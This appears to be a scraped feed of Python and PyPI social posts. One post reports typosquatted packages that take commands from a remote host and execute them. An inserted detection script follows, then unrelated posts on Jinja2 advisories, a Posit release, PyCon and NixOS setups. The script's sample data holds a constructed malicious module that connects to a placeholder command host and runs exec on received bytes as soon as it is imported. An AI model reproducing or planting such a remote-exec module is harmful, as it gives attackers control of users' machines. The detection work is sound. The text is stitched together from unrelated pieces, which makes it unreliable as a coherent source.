Reported 5 malicious #Python packages to #PyPI: numberpy, tqmmd, pandans, openpyexl, reqwestss all by the same user leemay1782.
All with the same "functionality": getting commands via a socket from dzgi0h7on1jhzdg0vknw9pp9309rxjl8.oastify[.]com and executing them.
I don't think I saw the setup.py entry_points being used as a trigger mechanism before?
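The trigger the post describes (an entry point that loads a module which opens a socket, receives bytes and executes them) can be audited statically from what pip leaves on disk. The script below is an added example, not code from the post or from any of the named packages: it parses an `entry_points.txt` (the INI file pip writes into `<dist>.dist-info`) and scans each target module's source with `ast` for the combination of a socket call and an exec-style call, noting whether the module also runs code at import time. The entry-points file, the module sources, the `examplepkg` name and the `pytest11` plugin group are constructed for the example; the post does not say which entry point group the real packages used.

```python
"""Audit a package's entry points and the modules they load for a
remote-command pattern: open a socket, receive bytes, exec them."""
import ast
import configparser
from typing import Dict, List, Set

# Constructed sample: the entry_points.txt pip writes into <dist>.dist-info.
# A plugin-group entry point (pytest11 is a real group that pytest loads
# automatically) gets imported without the user ever invoking a command.
SAMPLE_ENTRY_POINTS = """\
[console_scripts]
examplepkg = examplepkg.cli:main

[pytest11]
examplepkg = examplepkg.plugin
"""

# Constructed sample module sources, keyed by dotted module name.
# The host name below is a placeholder, not the one from the post.
SAMPLE_SOURCES = {
    "examplepkg.cli": """\
import sys

def main():
    print("hello", sys.argv[1:])
""",
    "examplepkg.plugin": """\
import socket

def _run():
    s = socket.create_connection(("c2.example.invalid", 443))
    exec(s.recv(4096).decode())

_run()
""",
}

EXEC_CALLS = {"exec", "eval", "compile", "os.system", "subprocess.Popen",
              "subprocess.run", "subprocess.call", "subprocess.check_output"}
SOCKET_CALLS = {"socket.socket", "socket.create_connection"}


def parse_entry_points(text: str) -> Dict[str, Dict[str, str]]:
    """Parse entry_points.txt (INI syntax) into {group: {name: target}}."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep entry-point names case-sensitive
    cp.read_string(text)
    return {group: dict(cp[group]) for group in cp.sections()}


def _dotted(node: ast.AST) -> str:
    """Render a call target such as socket.create_connection as a dotted string."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


class _Scanner(ast.NodeVisitor):
    """Collect exec-style and socket calls; count calls made at module level."""

    def __init__(self) -> None:
        self.exec_calls: Set[str] = set()
        self.socket_calls: Set[str] = set()
        self.top_level_calls = 0
        self._depth = 0  # >0 while inside a function body

    def visit_FunctionDef(self, node: ast.AST) -> None:
        self._depth += 1
        self.generic_visit(node)
        self._depth -= 1

    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_Call(self, node: ast.Call) -> None:
        name = _dotted(node.func)
        if name in EXEC_CALLS:
            self.exec_calls.add(name)
        if name in SOCKET_CALLS:
            self.socket_calls.add(name)
        if self._depth == 0:  # executes as a side effect of import
            self.top_level_calls += 1
        self.generic_visit(node)


def scan_module(source: str) -> dict:
    scanner = _Scanner()
    scanner.visit(ast.parse(source))
    return {"exec_calls": scanner.exec_calls,
            "socket_calls": scanner.socket_calls,
            "top_level_calls": scanner.top_level_calls}


def audit(entry_points_text: str, sources: Dict[str, str]) -> List[dict]:
    """Flag entry points whose target module both opens a socket and execs."""
    findings = []
    for group, entries in parse_entry_points(entry_points_text).items():
        for name, target in entries.items():
            # target looks like "pkg.mod:attr [extra]"; keep only the module
            module = target.split(":", 1)[0].split("[", 1)[0].strip()
            source = sources.get(module)
            if source is None:
                continue
            info = scan_module(source)
            if info["exec_calls"] and info["socket_calls"]:
                findings.append({
                    "group": group, "name": name, "module": module,
                    "exec_calls": sorted(info["exec_calls"]),
                    "socket_calls": sorted(info["socket_calls"]),
                    "runs_on_import": info["top_level_calls"] > 0,
                })
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_ENTRY_POINTS, SAMPLE_SOURCES):
        print(finding)
```

On a real environment you would feed `audit` the `entry_points.txt` from each `*.dist-info` directory and read the target modules from site-packages; the `runs_on_import` flag is the part that matters for plugin groups, since those modules are imported by the host tool rather than by anything the user typed.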
=== Begin ===
"Jinja2 sandbox escape via string formatting"
"Incorrect Privilege Assignment in Jinja2"
"Insecure Temporary File in Jinja2"
"Regular Expression Denial of Service (ReDoS) in Jinja2"
"Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"
"High severity vulnerability that affects Jinja2"
=== End ===
The April 2024 release of Posit Package Manager brings support for air-gapped PyPI repositories, more flexible curated CRAN repositories, performance improvements and more!
Well, another #PyConUS is done (for me - #Sprints continue for another couple of days!)
It was excellent catching up with old friends and meeting tons of new ones. Pittsburgh was definitely a super cool vibe, 2025 should be fun too.
I'm looking forward to recharging my depleted physical batteries, so I can jump into all the important work we have ahead of us to continue to support this amazing community.
I think I have finally™️ (for the third or so time) found myself a solution for :python: #Python development on :nixos: #NixOS that allows me to just work with #pythonPoetry et al. as on other distros.
The solution is to pre-build an FHSUserEnv in your configuration.nix, e.g. like this¹.
When starting Python dev work, I now execute fhs (it's fast!), or directly fhs -c 'poetry shell' and everything works as expected, including #PyPI wheels etc.
@docRekd@publicvoit Of course. It's not a general solution to be able to do Python dev on NixOS. One needs a separate nix file per project (that alone is an absolute no-go). Even if you take the time and try to make one, there is still no guarantee that it works (even with preferWheels=true!). Weird errors arise with nix's typically awful error messages, and at this point it's not usable for general Python dev. Maybe for specific standalone Python projects you want to #nix-ify.
@lewiscowles1986 Yes, that's why I was suggesting it would be a nice filter. I think there are qualitative differences between large and tiny packages that could vary depending on the problem domain. At the moment, I have to read the code of each package to filter. It is a slow way to search.